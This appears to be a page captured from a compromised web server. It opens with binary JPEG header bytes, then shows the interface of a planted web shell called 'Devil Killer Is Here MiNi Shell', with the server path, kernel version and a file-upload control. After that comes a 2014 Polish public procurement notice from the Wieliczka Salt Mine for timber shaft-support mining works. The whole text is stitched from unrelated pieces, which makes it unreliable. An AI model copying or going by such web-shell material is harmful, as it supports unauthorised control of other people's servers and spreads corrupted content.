JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140331/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140331/68619-N-2014.html

<p class="kh_header"><b>Wieliczka: Zabezpieczenie szybika z komory Warszawa wraz z chodnikami dojściowymi</b><br>
<b>Numer ogłoszenia: 68619 - 2014; data zamieszczenia: 31.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo-Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabezpieczenie szybika z komory Warszawa wraz z chodnikami dojściowymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zabezpieczenia górniczego szybika z komory Warszawa wraz z    chodnikami dojściowymi, zwane dalej robotami górniczymi.
2.  W ramach wykonania robót górniczych Wykonawca jest zobowiązany:
1) zorganizować plac robót,
2) sporządzić technologię wykonywania robót,
3) zrealizować roboty górnicze,
4) zapewnić materiały niezbędne do realizacji robót górniczych,
5) zapewnić maszyny i urządzenia niezbędne do wykonania robót górniczych,
6) zapewnić osoby posiadające odpowiednie uprawnienia i kwalifikacje do nadzoru nad prowadzonymi robotami górniczymi.
3.  Roboty górnicze winny być wykonane zgodnie z:
1)  dokumentacją projektową pod nazwą: Projekt techniczny robót
zabezpieczających dla przebudowy szybika do komory Warszawa wraz z wyrobiskami dojściowymi i z podszybiem Skoczylas - załącznik nr 1 do SIWZ,
2)  pozwoleniem nr 469/13 Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót przy zabytku wpisanym do rejestru z dnia 10 czerwca 2013 r. znak: OZKr.5142.321.2013.JCh - załącznik nr 2 do SIWZ,
4. Szacunkowy zakres robót górniczych określa poniższy przedmiar:
I. Przebudowa chodnika dojściowego do podszybia szybika Skoczylas
1. Demontaż dotychczasowej obudowy drewnianej - rabowanie krawędziaków i okrąglaków odrzwi - 24 szt.
2. Demontaż dotychczasowej wykładki stropu i ociosów - 47m2
3. Przybierka lokalna stropu oraz spągu i ociosów chodnika - 35,8m3
4. Transport urobku na wysypkę - 41,85m3
5. Zabudowa odrzwi z okrąglaków drewnianych O25cm na wlocie do podszybia szybika Skoczylas; długość elementów odrzwi ok. 1,75m i wys. 2,45m - 4 kpl
6. Zabudowa odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi 2,7m i wys. 2,45m - 1 kpl
7. Zabudowa odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi 3,9m i wys. 2,7m + zabudowa stojaka środkowego podpierającego stropnice dł. ok. 2,7m - 1 kpl
8. Zabudowa dwu odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi ok. 3,65m oraz 3,00m i wys. 2,7m (stropnice z jednej strony oparte na podciągu z drugiej na stojaku) - 2 kpl
9. Zabudowa dwu odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi ok. 1,9m oraz 1,05m i wys. 2,45m - 2 kpl
10. Zabudowa dwu odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi ok. 3,6m i wys. 2,45m + zabudowa stojaka środkowego podpierającego stropnice dł. ok. 2,2m - 2 kpl
11. Zabudowa odrzwi z okrąglaków drewnianych śred. 25cm na podszybiu szybika Skoczylas; długość elementów odrzwi ok. 2,7m i wys. 2,45m - 3 kpl
12. Wykonanie wykładki z desek o gr. 0,04 - 85,55m2
II. Przebudowa chodnika dojściowego do nadszybia szybika stropowego komory Warszawa 
1. Demontaż dotychczasowej obudowy drewnianej - rabowanie odrzwi - 6 szt.
2. Demontaż dotychczasowej wykładki stropu i ociosów - 7m2
3. Przybierka lokalna stropu oraz spągu i ociosów chodnika - 21,4m3
4. Transport urobku na wysypkę - 22,7m3
5. Zabudowa odrzwi z krawędziaków drewnianych śred. 25cm; długość elementów odrzwi ok. 2,7m i wys. 2,45m - 11 kpl
6. Wykonanie wykładki z desek o gr. 0,04m - 58,9m2
III. Przebudowa nadszybia szybika stropowego komory Warszawa
1. Zabudowa bona zabezpieczającego komorę Warszawa przed skutkami robót w szybiku i nadszybiu szybika. Konstrukcja z krawędziaków drewnianych śred. 25cm; długość elementów ok. 2,5m - 1 kpl
2. Demontaż dotychczasowej obudowy drewnianej - rabowanie konstrukcji odrzwi z elementów krawędziaków i okrąglaków - 22 szt.
3. Demontaż dotychczasowej wykładki stropu i ociosów - 24m2
4. Przybierka stropu oraz spągu i ociosów nadszybia do wymiarów 3,3x3,6x3m - 19,8m3
5. Transport urobku na wysypkę - 26,05m3
6. Zabudowa spągownic przyociosowych z krawędziaków drewnianych śred. 25cm; długość elementów ok. 2,9m - 2 szt.
7. Zabudowa stojaków obudowy nadszybia z krawędziaków drewnianych śred. 25cm; długość elementów odrzwi ok. 2,95m - 14 szt.
8. Zabudowa stropnic obudowy nadszybia z krawędziaków drewnianych śred. 25cm; długość elementów odrzwi ok. 3,6m - 7 kpl
9. Wykonanie wykładki z desek o gr. 0,04 - 45,48m2
IV. Przebudowa szybika stropowego komory Warszawa
1. Demontaż żyrandola zabudowanego pod stropem komory w obrysie szybika z jego opuszczeniem do komory - 1 szt.
2. Zabudowa bona zabezpieczającego komorę Warszawa przed skutkami robót w szybiku i nadszybiu szybika. Konstrukcja z krawędziaków drewnianych śred. 25cm; zabudowa poniżej stropu komory Warszawa wraz ze szczelnym foliowaniem, długość elementów ok. 2,5m - 1 kpl
3. Demontaż dotychczasowej obudowy drewnianej szybika - rabowanie krawędziaków konstrukcji wieńców i rozpór narożnych z wyciągnięciem materiału na poziom chodnika - 26 szt.
4. Demontaż dotychczasowej wykładki ociosów szybika z wyciągnięciem materiału na poziom chodnika - 44,8m2
5. Przybierka ociosów szybika na odcinku planowanej zabudowy cembrowiny do wymiarów 2,50x2,50m z wyciągnięciem urobku na poziom chodnika - 11,13m3
6. Transport urobku na wysypkę - 16,63m3
7. Budowa wieńca podstawowego szybika z krawędziaków 0,25x0,25m i długości 2,9m - 2 szt.
8. Budowa cembrowiny szybika z krawędziaków 0,25x0,25x2,5m - 11 kpl
9. Zabudowa kotew szkłoepoksydowych o dł. 4,0m (łączonych nakrętką z dwu odcinków 2m) po dwie kotwy na każdej belce cembrowiny - 368 m
10. Poszerzenie wymiarów szybika na odcinku poniżej obudowy drewnianej do stropu komory (wym. 2,0x2,0m) - 9,2m3
11. Opuszczenie urobku na poziom spągu komory poprzez rurę segmentową i transport na wysypkę - 9,2m3
12. Wykonanie ozdobnego wieńca drewnianej obudowy wlotu szybika (krawędziaki 0,25x0,25m o długości 2,5m) - 1 kpl
13. Zabudowa kotew szkłoepoksydowych o dł. 6,0m w drewnianym wieńcu u wlotu do szybika - 96 m
14. Demontaż obu bon zabezpieczających komorę przed skutkami remontu - 2 kpl
5. Wykonawca może zrealizować większą ilość poszczególnego rodzaju robót określonych w przedmiarze zamieszczonym w pkt 4, jeżeli będzie to konieczne dla realizacji robót górniczych w pełnym zakresie wynikającym z dokumentacji projektowej, o której mowa pkt 3. ppkt 1. Wykonawca jest zobowiązany do niezwłocznego poinformowania Zamawiającego o przewidywanej konieczności realizacji większej ilości poszczególnych rodzajów robot określonych w przedmiarze zamieszczonym w pkt 4. Na wykonanie większej ilości poszczególnych rodzajów robót, określonych w przedmiarze zamieszczonym w pkt 4., niezbędna jest uprzednia pisemna zgoda Zamawiającego, wyrażona wedle zasad reprezentacji Zamawiającego.
6. Wykonawca zrealizuje mniejszą ilość poszczególnego rodzaju robót, określonych w przedmiarze zamieszczonym w pkt 4., jeżeli ich wykonanie nie będzie konieczne dla realizacji robót górniczych w pełnym zakresie, wynikającym z dokumentacji projektowej, o której mowa w pkt 3. ppkt 1.
Szczegółowe informacje dotyczące przedmiotu zamówienia i jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 9 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium w wysokości: 10 000,00 zł należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.  2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:  Bank Pekao Spółka Akcyjna Oddział w Wieliczce Konto: 75124047481111000048778501, z dopiskiem: wadium w sprawie KSW/2014/TRG/21 Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.  Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.  3. Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 SIWZ. 4. Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3  ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ww. ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 6. Zgodnie z art. 46 ust. 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 3) nie wniósł zabezpieczenia należytego wykonania umowy. 7. Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt. 2 ustawy - Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie należytego wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na wykonaniu górniczych robót zabezpieczających w podziemnych wyrobiskach zakładu górniczego, o wartości nie mniejszej niż 100 000,00 zł brutto, z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów czy została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) udokumentowanie, że realizacja przedmiotu zamówienia nastąpi pod kierownictwem osoby posiadającej kwalifikacje uprawniające do pełnienia, w podziemnej części Zakładu Górniczego Kopalni Soli Wieliczka, funkcji kierownika działu robót górniczych,
2) udokumentowanie, że objęcie bieżącego dozoru robót górniczych, na każdej obsadzonej zmianie roboczej, nastąpi przez osoby posiadające kwalifikacje uprawniające do pełnienia, w podziemnej części Zakładu Górniczego Kopalni Soli Wieliczka, funkcji osoby co najmniej średniego dozoru ruchu w specjalności górniczej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 500 000,00 zł (polisa a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zgodnie z przepisem art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,  dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa 
w pkt 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1) niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej, o której mowa w § 7 ust. 1 pkt 1 umowy,
2) pojawienia się na rynku materiałów, urządzeń, rozwiązań technicznych lub technologicznych pozwalających na zmniejszenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy lub zwiększenie wartości użytkowej wykonanego przedmiotu umowy,
3) potrzeby wykonania przedmiotu umowy przy użyciu innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej, o której mowa w § 7 ust. 1 pkt 1 umowy. Potrzeba wykonania przedmiotu umowy przy użyciu innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych zachodzi 
w sytuacji gdy:
a) użycie przewidzianych w dokumentacji projektowej, o której mowa w § 7 ust. 1 pkt 1 umowy, materiałów, urządzeń rozwiązań technicznych lub technologicznych, groziłoby niewykonaniem lub nienależytym wykonaniem przedmiotu umowy przez Wykonawcę,
b) użycie innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych wynika ze zmiany przepisów prawa, 
4) wystąpienia odmiennych od przyjętych w dokumentacji projektowej, o której mowa w § 7 ust. 1 pkt 1 umowy, warunków geologicznych, hydrogeologicznych lub górniczych, które groziłyby niewykonaniem lub nienależytym wykonaniem przedmiotu umowy przez Wykonawcę przy użyciu dotychczasowych materiałów, urządzeń lub zastosowaniu dotychczasowych rozwiązań technicznych 
lub technologicznych,
5) potrzeby usunięcia ujawnionych sprzeczności lub wad w dokumentacji projektowej, o której mowa w § 7 ust. 1 pkt 1 umowy,
6) udzielenia Wykonawcy przez Zamawiającego zamówienia na wykonanie robót dodatkowych, w rozumieniu przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
7) kolizji prowadzonych przez Wykonawcę robót z planowanymi lub równolegle prowadzonymi przez Zamawiającego inwestycjami,
8) przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
9) działania siły wyższej,
10) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3. Dopuszcza się możliwość dokonania zmian postanowień umowy w zakresie terminu realizacji umowy w przypadku konieczności wykonania większej ilości poszczególnych rodzajów prac przewidzianych w kosztorysie, o czym mowa w § 7 ust. 3 oraz § 23 ust. 3.
4. Zaistnienie, którejkolwiek z przyczyn, wymienionych w pkt 1, nie powoduje powstania u żadnej ze stron umowy, roszczenia o zmianę umowy.
5. W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 1, każdej ze stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1) szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2) uzasadnienie dokonania zmiany umowy,
3) projekt zmiany umowy.
6. Wystąpienie, o którym mowa w pkt 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7. Zmiana umowy oraz załączników do umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
8. Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
9. Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
10. Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A, parter..</p>
